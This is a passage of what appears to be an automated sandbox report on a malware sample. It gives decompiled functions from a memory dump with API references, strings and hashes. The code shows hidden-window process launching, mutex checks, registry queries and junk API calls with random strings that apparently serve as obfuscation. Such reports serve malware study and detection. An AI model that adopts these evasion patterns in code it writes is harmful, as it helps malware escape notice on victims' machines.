					_t32 = E00ECFE78("2pycs6WUm8Z4e 5ZJnsipre4ijgpk3ih9tETsDywOTuNWTRDR FmJsOo 4v E,KAqzhJjGpXtmiVAN9OBFxz4zxOO2 03L9r8k AhXRSXe6ayN 7,yM Rd38sOrsOXd5B4GSgO1r.Iry5bfc 862GXiRvyU  p 7SBLDe,wRepTPHuVCkserPpUgcD2 bVURfGHp8 5AzuiRVQe77D2.05nSp J5 c6XTw. LVmbvOL XKzNW1DD82.Dx 3JUAzrLDmOlD  zlgIA5fAekG,3M7.FCyvG7 oKA37Cg17knQhNKvuwFRVs70BBkZ3lJt,s4K9vdClWdtk8h91CwJennPMflWJiOWvjV.4eENg0 ra7V d32USqrTS36S79aHNr  rAC TVCmlF ex4C6 gpfJGRqF9xafBgG4fl5i5C6PiPve.BONHHU7Zlm4hweeX7YLw4yguKBkQG0P7i7t egMWizI9y.PPfaCK.WdNvrGW3r0.6xckl7GzCKq 9SepbLR1,Xy slc WzBSWe1nud8wvcZ .9o FaLoM8IaEpCMmNI8oKFK..HCkYeezobrZ5afh9AXyV4GnBuzOz1hK0VsDzGY9t 2ZWux81VUpzVAXp.dfLreZy6OIPKRvTzOfwLeQM0CFjeNmHwikQ2AWQLzctN8RkYkLEzfAf97H5vDuuufa,jdch6BnsbyXmUkM.CwjdG1dav2vCouT01jbT6tlcNn wxH1lVcB17,4u7gqrWTj8P2 O5J.bme8 J ZC  3p 92wFksOc5udhpCu9ozkQ4dBNCc60GulvYaTt.B waI74ePAu7mvhpq2X,OvRITFQck,,RmHPpyQlumdYRVGczk iuGWei8MkHBy,SGdNzb,FfZiPqnqz90GXwBA58VwYiSUP0hu M1 uU4OXVX9BQx cLLrZg h7 Nt DsJCDz CwwXAFeIYXF4U2TL11L9 tkDgSYHNafma MNchmM nom0Yh OIZjVcFkpqKuB89BHBFKBzomI Duj3s.3s8qFTO2rW2Xe0P2YtdysUgeUYzT4OUvLPx4MYdW7i95ztWqw2yp7Wmww7LMy ,nzQsHv.TxueYLZqsfB8uud6MtEb0Gt X.21S.nlGn qBXAn6BBur4V4wLO 6i3.5qFtTdMRMqa8S.tG86mViW8gIpoQJh28EBNQTZISMSsZLmusFWhaxP5HD8crv.BM.q aPsrDrH6tc PS Cl.kOwmlwWH J1yxFzUtcOjhJS8qNKPREH51Voro0Bs cHK25ewZP8zvjqsAFrNUkI7 ,7v,BXJ13pEaq80lI 1oDauHc,o2Xwm0sr 3YfY9UniRdu7petoUZlr.mEYw EUlGtGPjR24WQrd.Oy22BynRqpTwRGvap2fiOSFxwnmSZWEAo7kne0wsyt K3ueW g9");
					_pop(_t41);
					_t43 = 0xf;
					__eflags = _t32 - _t43;
					if(_t32 <= _t43) {
						_t43 = _t32;
					}
					_t39 = 0;
					_v5 = 0;
					__eflags = _t43;
					if(_t43 == 0) {
						L8:
						__eflags = _a12 - 4;
						if(_a12 == 4) {
							goto L14;
						}
						__eflags = _a12 - 7;
						if(__eflags == 0) {
							L11:
							E00EDBFC9(_t41, __eflags, _t49);
							goto L15;
						}
						__eflags = _a12 - 0x12;
						if(__eflags != 0) {
							goto L15;
						}
						goto L11;
					} else {
						do {
							_t7 = _t39 + 0x42; // 0x42
							 *((char*)(_t45 + _t39 - 0x10)) = _t7;
							MultiByteToWideChar(0, 0,  &_v20, 0xffffffff,  &_v84, 0x20);
							_t39 = _t39 + 1;
							__eflags = _t39 - _t43;
						} while (_t39 < _t43);
						goto L8;
					}
				}
				_push(_a16);
				_push(_a12);
				_push(_a8);
				goto L13;
			}

0x00ec41ec
0x00ec4200
0x00ec4209
0x00ec420c
0x00ec42a9
0x00ec42a9
0x00ec42ae
0x00ec42ae
0x00000000
0x00ec42ae
0x00ec4212
0x00ec4213
0x00ec428a
0x00ec4291
0x00ec4294
0x00ec4297
0x00ec429a
0x00ec429c
0x00ec429f
0x00000000
0x00ec42a4
0x00ec421a
0x00ec4229
0x00ec4234
0x00ec4239
0x00ec423c
0x00ec423d
0x00ec423f
0x00ec4241
0x00ec4241
0x00ec4243
0x00ec4245
0x00ec4249
0x00ec424b
0x00ec426f
0x00ec426f
0x00ec4275
0x00000000
0x00000000
0x00ec4277
0x00ec427b
0x00ec4283
0x00ec4283
0x00000000
0x00ec4283
0x00ec427d
0x00ec4281
0x00000000
0x00000000
0x00000000
0x00ec424d
0x00ec424d
0x00ec424f
0x00ec4252
0x00ec4264
0x00ec426a
0x00ec426b
0x00ec426b
0x00000000
0x00ec424d
0x00ec424b
0x00ec421c
0x00ec421f
0x00ec4222
0x00000000

APIs

GetCPInfoExA.KERNEL32(00000021,00000045,?), ref: 00EC4200
GetLastError.KERNEL32 ref: 00EC4229
MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,00000020), ref: 00EC4264

Strings

2pycs6WUm8Z4e 5ZJnsipre4ijgpk3ih9tETsDywOTuNWTRDR FmJsOo 4v E,KAqzhJjGpXtmiVAN9OBFxz4zxOO2 03L9r8k AhXRSXe6ayN 7,yM Rd38sOrsOXd5B4GSgO1r.Iry5bfc 862GXiRvyU p 7SBLDe,wRepTPHuVCkserPpUgcD2 bVURfGHp8 5AzuiRVQe77D2.05nSp J5 c6XTw. LVmbvOL XKzNW1DD82.Dx 3JUAzrLDmO, xrefs: 00EC422F

Memory Dump Source

Source File: 00000005.00000002.984573064.0000000000EC0000.00000040.00000001.sdmp, Offset: 00EC0000, based on PE: true

Yara matches

Similarity

API ID: ByteCharErrorInfoLastMultiWide
String ID: 2pycs6WUm8Z4e 5ZJnsipre4ijgpk3ih9tETsDywOTuNWTRDR FmJsOo 4v E,KAqzhJjGpXtmiVAN9OBFxz4zxOO2 03L9r8k AhXRSXe6ayN 7,yM Rd38sOrsOXd5B4GSgO1r.Iry5bfc 862GXiRvyU p 7SBLDe,wRepTPHuVCkserPpUgcD2 bVURfGHp8 5AzuiRVQe77D2.05nSp J5 c6XTw. LVmbvOL XKzNW1DD82.Dx 3JUAzrLDmO
API String ID: 4008099680-648528917
Opcode ID: 28fd96785a8eec3053b69891d2a392312b06e10d4f9ae4b04b20ea797cef99ce
Instruction ID: 0b36bfab96c5ebb5ac6129311ed61edde0fd01821696ae484b60c8559acd96d0
Opcode Fuzzy Hash: 28fd96785a8eec3053b69891d2a392312b06e10d4f9ae4b04b20ea797cef99ce
Instruction Fuzzy Hash: E421CF72100258AFDB259FD49E5AFBE3BA8FB04710F442529FE10B90E1C3B2C916DB91

Uniqueness

Uniqueness Score: -1.00%

Function 00EC834A, Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 69
stringCOMMON

Download Yara Rule

C-Code - Quality: 94%

			E00EC834A() {
				intOrPtr _v8;
				intOrPtr _v12;
				CHAR* _v16;
				signed int _v20;
				void* __edi;
				void* __esi;
				intOrPtr _t27;
				intOrPtr _t28;
				intOrPtr _t29;
				void* _t30;
				signed int _t34;
				intOrPtr _t37;
				intOrPtr _t38;
				signed int _t39;
				CHAR* _t42;
				void* _t44;

				_t39 =  *0xef5788; // 0x2
				_t40 = _t39 * 0x64;
				_t34 = 0;
				_v20 = _t39 * 0x64;
				_t42 = E00ECD239(_t40);
				_v16 = _t42;
				if(_t42 != 0) {
					_v12 = 0;
					__eflags =  *0xef5788; // 0x2
					if(__eflags <= 0) {
						L9:
						E00ED1253(_t42,  *0xef5758, 0xe); // executed
						E00ECD1EA( &_v16, _t34);
						__eflags = 0;
						return 0;
					}
					_v8 = 0;
					do {
						_t27 =  *0xef5730; // 0x51f1628
						_t37 = _v8;
						__eflags =  *(_t37 + _t27);
						if( *(_t37 + _t27) != 0) {
							__eflags = _t34;
							if(_t34 != 0) {
								lstrcatA(_t42, "|");
								_t34 = _t34 + 1;
								__eflags = _t34;
							}
							_t29 = _v8;
							_t38 =  *0xef5730; // 0x51f1628
							_push( *((intOrPtr*)(_t29 + _t38 + 0x10)));
							_push( *((intOrPtr*)(_t29 + _t38 + 8)));
							_t30 = E00ECE20F(_t40 - _t34,  &(_t42[_t34]), "%u;%u;%u",  *((intOrPtr*)(_t29 + _t38)));
							_t44 = _t44 + 0x10;
							_t34 = _t34 + _t30; // executed
							__eflags = _t34;
							IsValidCodePage(0x12); // executed
							_t40 = _v20;
							_t42 = _v16;
						}
						_v12 = _v12 + 1;
						_t28 = _v12;
						_v8 = _v8 + 0x20;
						__eflags = _t28 -  *0xef5788; // 0x2
					} while (__eflags < 0);
					goto L9;
				}
				return 0xffffffff;
			}

0x00ec8353
0x00ec8359
0x00ec835d
0x00ec835f
0x00ec8367
0x00ec836c
0x00ec8371
0x00ec837b
0x00ec837e
0x00ec8384
0x00ec83ef
0x00ec83f9
0x00ec8403
0x00ec840b
0x00000000
0x00ec840b
0x00ec8386
0x00ec8389
0x00ec8389
0x00ec838e
0x00ec8391
0x00ec8395
0x00ec8397
0x00ec8399
0x00ec83a1
0x00ec83a7
0x00ec83a7
0x00ec83a7
0x00ec83a8
0x00ec83ab
0x00ec83b1
0x00ec83b7
0x00ec83c5
0x00ec83ca
0x00ec83cf
0x00ec83cf
0x00ec83d1
0x00ec83d7
0x00ec83da
0x00ec83da
0x00ec83dd
0x00ec83e0
0x00ec83e3
0x00ec83e7
0x00ec83e7
0x00000000
0x00ec8389
0x00000000

APIs

Part of subcall function 00ECD239: RtlAllocateHeap.NTDLL(00000008,?,?,00ECE8D2,00000100,?,00EC33EA), ref: 00ECD247

lstrcatA.KERNEL32(00000000,00EF2284,00000000,609BBD5D,609BBD5D,?,?,?,00EC85A9), ref: 00EC83A1
IsValidCodePage.KERNELBASE(00000012,?,00000000,609BBD5D,609BBD5D,?,?,?,00EC85A9), ref: 00EC83D1

Strings

%u;%u;%u, xrefs: 00EC83C0
, xrefs: 00EC83E3

Memory Dump Source

Source File: 00000005.00000002.984573064.0000000000EC0000.00000040.00000001.sdmp, Offset: 00EC0000, based on PE: true

Yara matches

Similarity

API ID: AllocateCodeHeapPageValidlstrcat
String ID: $%u;%u;%u
API String ID: 1158706536-2815652646
Opcode ID: b571ee26c0d2ba03c5f55ac3760b5cd8d44b3e3df943bcaa3b8fb7be51e69352
Instruction ID: 903f10066779e91875ef286fa2cdecbefa6806a15ffe99e6e76f24edf5259750
Opcode Fuzzy Hash: b571ee26c0d2ba03c5f55ac3760b5cd8d44b3e3df943bcaa3b8fb7be51e69352
Instruction Fuzzy Hash: B621A132D00208EFDB10AFE9DE81EADB7F5EB54314B11156EE910B72A1DB729E46DA40

Uniqueness

Uniqueness Score: -1.00%

Function 00ECDD64, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 67
processCOMMON

Download Yara Rule

C-Code - Quality: 68%

			E00ECDD64(WCHAR* _a4, DWORD* _a8, intOrPtr _a12, intOrPtr _a16) {
				WCHAR* _v8;
				struct _PROCESS_INFORMATION _v24;
				struct _STARTUPINFOW _v100;
				intOrPtr _t32;
				intOrPtr _t34;
				intOrPtr _t38;

				_v8 = 0;
				memset( &_v100, 0, 0x44);
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				_v100.cb = 0x44;
				if(_a16 != 0) {
					_v100.dwFlags = 1;
					_v100.wShowWindow = 0;
					_v8 = 0x8000000;
				}
				if(CreateProcessW(0, _a4, 0, 0, 0, _v8, 0, 0,  &_v100,  &_v24) == 0) {
					return 0;
				} else {
					if(_a8 != 0) {
						_push(_a12);
						_t38 =  *0xef56c8; // 0x520f6c8
						_push(_v24.hProcess);
						if( *((intOrPtr*)(_t38 + 0x2c))() >= 0) {
							GetExitCodeProcess(_v24.hProcess, _a8);
						}
					}
					_t32 =  *0xef56c8; // 0x520f6c8
					 *((intOrPtr*)(_t32 + 0x30))(_v24.hThread);
					_t34 =  *0xef56c8; // 0x520f6c8
					 *((intOrPtr*)(_t34 + 0x30))(_v24);
					return 1;
				}
			}

0x00ecdd75
0x00ecdd78
0x00ecdd82
0x00ecdd83
0x00ecdd84
0x00ecdd88
0x00ecdd89
0x00ecdd93
0x00ecdd97
0x00ecdd9e
0x00ecdda2
0x00ecdda2
0x00ecddc7
0x00000000
0x00ecddc9
0x00ecddcc
0x00ecddce
0x00ecddd1
0x00ecddd6
0x00ecddde
0x00ecdde6
0x00ecdde6
0x00ecddde
0x00ecddef
0x00ecddf4
0x00ecddfa
0x00ecddff
0x00000000
0x00ecde04

APIs

memset.MSVCRT ref: 00ECDD78
CreateProcessW.KERNELBASE(00000000,00001388,00000000,00000000,00000000,00000001,00000000,00000000,00000044,00ED07C4,?,00000000,00000000), ref: 00ECDDC2
GetExitCodeProcess.KERNEL32 ref: 00ECDDE6

Strings

D, xrefs: 00ECDD89

Memory Dump Source

Source File: 00000005.00000002.984573064.0000000000EC0000.00000040.00000001.sdmp, Offset: 00EC0000, based on PE: true

Yara matches

Similarity

API ID: Process$CodeCreateExitmemset
String ID: D
API String ID: 4170947310-2746444292
Opcode ID: 870ce3deb5445755a49c8c937a0b6a97fa39bebf311452094a01cedd8d44b679
Instruction ID: 7510442f94dff1136689055619ca541d7b44f0b4b63b1f23c3bef338bb981b73
Opcode Fuzzy Hash: 870ce3deb5445755a49c8c937a0b6a97fa39bebf311452094a01cedd8d44b679
Instruction Fuzzy Hash: 8721F4B690020DAFDB41DFA5DD88EAE7BBDEB08345B115029F615E6120D3329E15DB22

Uniqueness

Uniqueness Score: -1.00%

Function 00EC4DAD, Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 42
synchronizationCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00EC4DAD(signed int __eax, CHAR* _a4, intOrPtr _a8, intOrPtr* _a12) {
				signed int _t14;
				intOrPtr _t15;
				void* _t16;
				intOrPtr _t17;
				void* _t22;

				if(_a4 != 0) {
					_t22 = CreateMutexA(0, 1, _a4);
					if(_t22 != 0) {
						if(GetLastError() != 0xb7) {
							L8:
							 *_a12 = _t22;
							_t14 = 1;
						} else {
							_t15 =  *0xef56c8; // 0x520f6c8
							_t16 =  *((intOrPtr*)(_t15 + 0x2c))(_t22, _a8);
							if(_t16 == 0 || _t16 == 0x80) {
								goto L8;
							} else {
								_t17 =  *0xef56c8; // 0x520f6c8
								 *((intOrPtr*)(_t17 + 0x30))(_t22);
								_t14 = 0;
							}
						}
					} else {
						_t14 = GetLastError() | 0xffffffff;
					}
					return _t14;
				} else {
					return __eax | 0xffffffff;
				}
			}

0x00ec4db4
0x00ec4dce
0x00ec4dd2
0x00ec4dea
0x00ec4e10
0x00ec4e13
0x00ec4e17
0x00ec4dec
0x00ec4def
0x00ec4df5
0x00ec4dfa
0x00000000
0x00ec4e03
0x00ec4e03
0x00ec4e09
0x00ec4e0c
0x00ec4e0c
0x00ec4dfa
0x00ec4dd4
0x00ec4dda
0x00ec4dda
0x00ec4e1a
0x00ec4db6
0x00ec4dba
0x00ec4dba

APIs

CreateMutexA.KERNELBASE(00000000,00000001,00000000,?,=6,00EC4D70,00000000,=6,00000000,Global,00EEF744), ref: 00EC4DC8
GetLastError.KERNEL32 ref: 00EC4DD4

Strings

=6, xrefs: 00EC4DAD

Memory Dump Source

Source File: 00000005.00000002.984573064.0000000000EC0000.00000040.00000001.sdmp, Offset: 00EC0000, based on PE: true

Yara matches

Similarity

API ID: CreateErrorLastMutex
String ID: =6
API String ID: 1925916568-1054918284
Opcode ID: 578f798a8ec780f9165924668ca72517307c70b1b156f011d833b00e0ae2a0a9
Instruction ID: 257ecd60e4190dda97e084ed77e81d69c848d680b9722df7fd464b741b980d13
Opcode Fuzzy Hash: 578f798a8ec780f9165924668ca72517307c70b1b156f011d833b00e0ae2a0a9
Instruction Fuzzy Hash: 1701D1B21416049FDB215FA5E848FE93BA4BF04325F021518F929EF2E1C731C851CBA2

Uniqueness

Uniqueness Score: -1.00%

Function 00EC4425, Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 34
COMMON

Download Yara Rule

C-Code - Quality: 77%

			E00EC4425(void* __eflags, WCHAR* _a4) {
				void* _t4;
				int _t5;
				void* _t6;
				void* _t9;

				_t4 = E00ED0B5E(_a4); // executed
				if(_t4 == 0) {
					_t5 = CreateDirectoryW(_a4, 0); // executed
					if(_t5 != 0) {
						_t6 = E00ED0B5E(_a4); // executed
						if(_t6 != 0) {
							CreateEnhMetaFileA(0, "WnX4fvAztoWrz9O4euTKmdV.jmnfKClUJ66MGwKCah, nylXH42gtN9T9wh9,t nsTcz5 9FoA6AY.vUSPuFQv2wY90cbDj xw2W, DB2nI,FAjVznrJCDgeec0lfItCUpApfCOe.JojwFM4l3K02DSNkwJmfbe5EeoD2yNrDsJDUJrxAh7zDDqQHR26Ompfqbm WytUSxp9VgH4siQlpciYMEdKBOh,m6bpj.yoz DPdhjkgwoYgF,40gIkDKZ5DJSIGrXyWTE.jk1McRgcUn G5WS22RuwZBlSPeu65s84uBlhFp soY  Bg ziu e4WC7vJJMEVZze1ZNJ.c TgEU bmrY04qYgqsn1zIA2mSzqS3Ko9D 0koMTI YQZPnazEu907PrLcMBhbCS4.JPq hNxlXtmE2K3O0TVv LdyylT2LuBRqLXXKtjY  nJT6L U.wYR82nBKVkfJ9vghRVa9iePhpG4fucXrwoPFMd OwkB0ZCxd7AF d1lL8Ub.aKn8v0WgkO62UfxwtL0pocoHptp3pOfM3 7sesL1ZGGA1XaR8ptN0ZA5YJfeguoHkVNsX7rZY4THA542XTbAlYU6u.aKWdg4 59YcNPTkb1,mJLCJP9Hk2MJhruO0HocoBEV7VewNcTWFGpibFn4. CHtV,LVeXwh5ItAz0xcd88hUqfv1sLX3anQZ5dtHTURIo30uWXH47OhEjO, MJZTlh7etgdU7cwOcSb5aek8KjhcuA1gR7m79Y0f61QJ1XQ3B", 0, 0);
							goto L8;
						} else {
							_push(0xfffffffd);
							goto L4;
						}
					} else {
						_push(0xfffffffe);
						L4:
						_pop(_t9);
						return _t9;
					}
				} else {
					IsValidCodePage(0x47);
					L8:
					return 0;
				}
			}

0x00ec442b
0x00ec4433
0x00ec4444
0x00ec444c
0x00ec4456
0x00ec445e
0x00ec446f
0x00000000
0x00ec4460
0x00ec4460
0x00000000
0x00ec4460
0x00ec444e
0x00ec444e
0x00ec4450
0x00ec4450
0x00ec4452
0x00ec4452
0x00ec4435
0x00ec4437
0x00ec4475
0x00ec4478
0x00ec4478

APIs

Part of subcall function 00ED0B5E: GetFileAttributesW.KERNELBASE(?,?,00EC4430,?,?,00EC4342,00EC9A80,?,?,00EE1614,?,00EE1614,?,00EE1614,?,00000000), ref: 00ED0B69

IsValidCodePage.KERNEL32(00000047,?,00EC4342,00EC9A80,?,?,00EE1614,?,00EE1614,?,00EE1614,?,00000000,000002CE,00EC933C,?), ref: 00EC4437
CreateDirectoryW.KERNELBASE(?,00000000,?,00EC4342,00EC9A80,?,?,00EE1614,?,00EE1614,?,00EE1614,?,00000000,000002CE,00EC933C), ref: 00EC4444

Strings

WnX4fvAztoWrz9O4euTKmdV.jmnfKClUJ66MGwKCah, nylXH42gtN9T9wh9,t nsTcz5 9FoA6AY.vUSPuFQv2wY90cbDj xw2W, DB2nI,FAjVznrJCDgeec0lfItCUpApfCOe.JojwFM4l3K02DSNkwJmfbe5EeoD2yNrDsJDUJrxAh7zDDqQHR26Ompfqbm WytUSxp9VgH4siQlpciYMEdKBOh,m6bpj.yoz DPdhjkgwoYgF,40gIkDKZ5DJSI, xrefs: 00EC4468

Memory Dump Source

Source File: 00000005.00000002.984573064.0000000000EC0000.00000040.00000001.sdmp, Offset: 00EC0000, based on PE: true

Yara matches

Similarity

API ID: AttributesCodeCreateDirectoryFilePageValid
String ID: WnX4fvAztoWrz9O4euTKmdV.jmnfKClUJ66MGwKCah, nylXH42gtN9T9wh9,t nsTcz5 9FoA6AY.vUSPuFQv2wY90cbDj xw2W, DB2nI,FAjVznrJCDgeec0lfItCUpApfCOe.JojwFM4l3K02DSNkwJmfbe5EeoD2yNrDsJDUJrxAh7zDDqQHR26Ompfqbm WytUSxp9VgH4siQlpciYMEdKBOh,m6bpj.yoz DPdhjkgwoYgF,40gIkDKZ5DJSI
API String ID: 1399154533-1505391144
Opcode ID: 84789ddf997285b0f8cad0a23fc4840982636d32849decd79d7c2a175a03d515
Instruction ID: cd33c56bc7d8ef426fe790dee838b9c5c9d6bff296781f3d835876c995b1dca9
Opcode Fuzzy Hash: 84789ddf997285b0f8cad0a23fc4840982636d32849decd79d7c2a175a03d515
Instruction Fuzzy Hash: 38F0E530248209BAEE081B66FD16F583B65FB00778F309126F63DFD5E0DBA294829554

Uniqueness

Uniqueness Score: -1.00%

Function 00ED341E, Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 33
synchronizationCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00ED341E(CHAR* _a4, char _a8) {
				intOrPtr _t10;
				void* _t11;
				intOrPtr _t12;
				void* _t16;

				_t16 = CreateMutexA(0, 1, _a4);
				if(_t16 != 0) {
					if(GetLastError() == 0xb7) {
						_t3 =  &_a8; // 0xee3be0
						_t10 =  *0xef56c8; // 0x520f6c8
						_t11 =  *((intOrPtr*)(_t10 + 0x2c))(_t16,  *_t3);
						if(_t11 != 0 && _t11 != 0x80) {
							_t12 =  *0xef56c8; // 0x520f6c8
							 *((intOrPtr*)(_t12 + 0x30))(_t16);
							_t16 = 0;
						}
					}
					return _t16;
				}
				GetLastError();
				return 0;
			}

0x00ed3434
0x00ed3438
0x00ed344f
0x00ed3451
0x00ed3454
0x00ed345a
0x00ed345f
0x00ed3468
0x00ed346e
0x00ed3471
0x00ed3471
0x00ed345f
0x00000000
0x00ed3473
0x00ed343a
0x00000000

APIs

CreateMutexA.KERNELBASE(00000000,00000001,00000000,?,?,00EC9E38,?,00000064,00000001,00EE3BE0,00000000,00000000), ref: 00ED342E
GetLastError.KERNEL32(?,00EC9E38,?,00000064,00000001,00EE3BE0,00000000,00000000), ref: 00ED343A
GetLastError.KERNEL32(?,00EC9E38,?,00000064,00000001,00EE3BE0,00000000,00000000), ref: 00ED3444

Strings

;, xrefs: 00ED3451

Memory Dump Source

Source File: 00000005.00000002.984573064.0000000000EC0000.00000040.00000001.sdmp, Offset: 00EC0000, based on PE: true

Yara matches

Similarity

API ID: ErrorLast$CreateMutex
String ID: ;
API String ID: 200418032-945222142
Opcode ID: 6992a7a91cc0b049d2b81d21055818102d15029510db2340f51dd7afa34d3145
Instruction ID: dd300040bbed517d89bf3be4c44fff06d143b05278c68e8c13b152b4d8ab4822
Opcode Fuzzy Hash: 6992a7a91cc0b049d2b81d21055818102d15029510db2340f51dd7afa34d3145
Instruction Fuzzy Hash: ADF054322015149FC7221BB6D84CB997794EF08755F424062FA59EB270C674C9458BD2

Uniqueness

Uniqueness Score: -1.00%

Function 00EC657E, Relevance: 6.1, APIs: 4, Instructions: 94
synchronizationwindowCOMMON

Download Yara Rule

C-Code - Quality: 84%

			E00EC657E(void* __ecx) {
				signed int _v8;
				void* _t5;
				signed int _t6;
				signed int _t7;
				signed int _t14;
				signed int _t16;
				intOrPtr _t17;
				intOrPtr* _t30;

				_t5 = CreateMutexA(0, 0, 0); // executed
				 *0xef56f8 = _t5;
				if(_t5 != 0) {
					_t6 = CreateMutexA(0, 0, 0);
					 *0xef56f4 = _t6;
					__eflags = _t6;
					if(_t6 == 0) {
						goto L2;
					} else {
						_push(0x49);
						_v8 = E00EC27A1();
						_t6 = BitBlt(0, 0x18, 0xb, 0x25, 0x5b, 0, 0x61, 0x58, 0x2a);
						__eflags = _v8;
						if(_v8 == 0) {
							goto L2;
						} else {
							 *0xef5724 = E00ECEA79(0, _v8);
							E00ED02B3( &_v8);
							 *_t30 = 0x100;
							_t14 = E00ECD239();
							 *0xef5710 = _t14;
							__eflags = _t14;
							if(_t14 != 0) {
								 *0xef571c = 0;
								 *0xef5708 = 0;
								 *0xef570c = 0;
								_t16 = E00ECD239(0x401);
								 *0xef56fc = _t16;
								__eflags = _t16;
								if(_t16 != 0) {
									__eflags =  *0xef57b4; // 0x0
									if(__eflags == 0) {
										E00EDF0D4(0xedbcea, 0xedbca5);
									}
									_t17 = E00ED050A(0xef313c, 8, 0x4a1); // executed
									 *0xef56d8 = _t17;
									_t7 = 0;
									__eflags = 0;
								} else {
									_push(0xfffffffc);
									goto L7;
								}
							} else {
								_push(0xfffffffe);
								L7:
								_pop(_t7);
							}
						}
					}
				} else {
					_t6 = Arc(0, 0x3c, 2, 0x1d, 0x4e, 0x11, 0, 0x2b, 0x32);
					L2:
					_t7 = _t6 | 0xffffffff;
				}
				return _t7;
			}

0x00ec658f
0x00ec6591
0x00ec6598
0x00ec65bb
0x00ec65bd
0x00ec65c2
0x00ec65c4
0x00000000
0x00ec65c6
0x00ec65c6
0x00ec65de
0x00ec65e1
0x00ec65e7
0x00ec65ea
0x00000000
0x00ec65ec
0x00ec65f6
0x00ec65fe
0x00ec6603
0x00ec660a
0x00ec6610
0x00ec6615
0x00ec6617
0x00ec6625
0x00ec662b
0x00ec6631
0x00ec6637
0x00ec663d
0x00ec6642
0x00ec6644
0x00ec664a
0x00ec6650
0x00ec665c
0x00ec6662
0x00ec666f
0x00ec6677
0x00ec667c
0x00ec667c
0x00ec6646
0x00ec6646
0x00000000
0x00ec6646
0x00ec6619
0x00ec6619
0x00ec661b
0x00ec661b
0x00ec661b
0x00ec6617
0x00ec65ea
0x00ec659a
0x00ec65aa
0x00ec65b0
0x00ec65b0
0x00ec65b0
0x00ec6681

APIs

CreateMutexA.KERNELBASE(00000000,00000000,00000000,00000000,00EF5770,?,?,00EC45D5), ref: 00EC658F
Arc.GDI32(00000000,0000003C,00000002,0000001D,0000004E,00000011,00000000,0000002B,00000032), ref: 00EC65AA
CreateMutexA.KERNEL32(00000000,00000000,00000000,?,?,00EC45D5), ref: 00EC65BB
BitBlt.GDI32(00000000,00000018,0000000B,00000025,0000005B,00000000,00000061,00000058,0000002A), ref: 00EC65E1

Memory Dump Source

Source File: 00000005.00000002.984573064.0000000000EC0000.00000040.00000001.sdmp, Offset: 00EC0000, based on PE: true

Yara matches

Similarity

API ID: CreateMutex
String ID:
API String ID: 1964310414-0
Opcode ID: 716efc0b6a81184be3dfc8b4150503f039b0df8588b224292b18063665ab3677
Instruction ID: 1f90efde9f4957c3c2538ce3cf991e8cff755dfdd3ef99bd0f472ac6892bd13c
Opcode Fuzzy Hash: 716efc0b6a81184be3dfc8b4150503f039b0df8588b224292b18063665ab3677
Instruction Fuzzy Hash: B3212B71681720BED6216B62AD0AF5F3A94EB55B20F21191BF301FA1D0E6F14645CA94

Uniqueness

Uniqueness Score: -1.00%

Function 00ED0556, Relevance: 6.1, APIs: 4, Instructions: 72
registryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00ED0556(short* _a4, short* _a8) {
				void* _v8;
				int _v12;
				int _v16;
				char* _v20;
				long _t22;
				long _t25;
				char* _t26;
				intOrPtr _t27;
				long _t31;
				char* _t39;

				_v16 = 0;
				_v12 = 0;
				_v8 = 0;
				_t22 = RegOpenKeyExW(0x80000002, _a4, 0, 0x20019,  &_v8); // executed
				if(_t22 == 0) {
					_t25 = RegQueryValueExW(_v8, _a8, 0,  &_v16, 0,  &_v12); // executed
					if(_t25 != 0) {
						L6:
						if(_v8 != 0) {
							_t27 =  *0xef56d4; // 0x520f880
							 *((intOrPtr*)(_t27 + 0x1c))(_v8);
						}
						_t26 = 0;
						L10:
						return _t26;
					}
					_t39 = E00ECD239(_v12);
					_v20 = _t39;
					if(_t39 == 0) {
						goto L6;
					}
					_t31 = RegQueryValueExW(_v8, _a8, 0, 0, _t39,  &_v12); // executed
					if(_t31 == 0) {
						RegCloseKey(_v8);
						_t26 = _t39;
						goto L10;
					}
					E00ECD1EA( &_v20, 0xfffffffe);
					goto L6;
				}
				return 0;
			}

0x00ed056c
0x00ed0574
0x00ed0577
0x00ed057a
0x00ed0582
0x00ed05a0
0x00ed05a4
0x00ed05d8
0x00ed05db
0x00ed05e0
0x00ed05e5
0x00ed05e5
0x00ed05e8
0x00ed05f9
0x00000000
0x00ed05fa
0x00ed05ae
0x00ed05b1
0x00ed05b6
0x00000000
0x00000000
0x00ed05c5
0x00ed05c9
0x00ed05f4
0x00ed05f7
0x00000000
0x00ed05f7
0x00ed05d1
0x00000000
0x00ed05d7
0x00000000

APIs

RegOpenKeyExW.KERNELBASE(80000002,00000114,00000000,00020019,00EC9A80,73AFF520,000000FF,00000000,00000114,00EC9A80), ref: 00ED057A
RegQueryValueExW.KERNELBASE(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00ED05A0
RegQueryValueExW.KERNELBASE(?,00000000,00000000,00000000,00000000,?), ref: 00ED05C5

Memory Dump Source

Source File: 00000005.00000002.984573064.0000000000EC0000.00000040.00000001.sdmp, Offset: 00EC0000, based on PE: true

Yara matches

Similarity

API ID: QueryValue$Open
String ID:
API String ID: 1606891134-0
Opcode ID: b7fee3825aa92bf263dedc077c618a55faf60074e159f0e47fe701f46e80cdbf
Instruction ID: 89b85ca22b04c11cfca8d28dc66be504f71ec33e1cc30b33556ccd930c5a2a18
Opcode Fuzzy Hash: b7fee3825aa92bf263dedc077c618a55faf60074e159f0e47fe701f46e80cdbf
Instruction Fuzzy Hash: DD214A75904109FFDB209FA5ED44DAEBBBDEB84714B2444A6F910B6220D7718A02DB20

Uniqueness

Uniqueness Score: -1.00%

Function 00ED0B78, Relevance: 6.1, APIs: 4, Instructions: 72
stringCOMMON

Download Yara Rule

C-Code - Quality: 87%

			E00ED0B78(void* __ecx, WCHAR* _a4) {
				int _v8;
				void _v526;
				char _v528;
				void _v1046;
				char _v1048;
				intOrPtr _t26;
				char* _t30;
				intOrPtr _t31;
				intOrPtr _t38;
				intOrPtr _t42;
				void* _t45;
				void* _t49;
				void* _t50;

				_t45 = __ecx;
				_v1048 = 0;
				_v8 = 0x104;
				memset( &_v1046, 0, 0x206);
